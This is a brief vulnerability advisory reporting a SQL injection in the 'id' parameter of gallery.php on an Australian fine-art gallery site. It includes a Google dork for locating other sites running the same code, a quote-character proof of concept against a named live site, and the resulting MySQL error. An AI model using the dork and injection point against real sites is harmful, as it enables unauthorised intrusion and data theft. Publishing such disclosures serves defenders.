Melbourne Fineart Gallery Australia 1.0 SQL Injection

Melbourne Fineart Gallery Australia version 1.0 suffers from a remote SQL injection vulnerability.


MD5 | bef86bf6bb324625f40d63aba3aa19da

##################################################################################

# Exploit Title : Melbourne Fineart Gallery Australia 1.0 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Date : 30/12/2018
# Vendor Homepage : melbournefineart.com.au
# Tested On : Windows
# Exploit Risk : Medium
# Version Information : 1.0 - Apache 2.0.53 - PHP 4.3.11
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL
Command ('SQL Injection') ]
# CXSecurity Exploit Link : cxsecurity.com/ascii/WLB-2018050294

##################################################################################

# Google Dork : ''inurl:''/gallery.php?id='' site:com.au

# Exploit : /gallery.php?id=[SQL Injection ]

# Example Site =>

melbournefineart.com.au/gallery.php?id=18%27 [ Proof of Concept for SQL
Injection ] => archive.is/heFX2

# SQL/DB Error -- [You have an error in your SQL syntax; check the manual
that corresponds

to your MySQL server version for the right syntax to use near '' order by
image_order limit 1' at line 1]

##################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

##################################################################################

Related Posts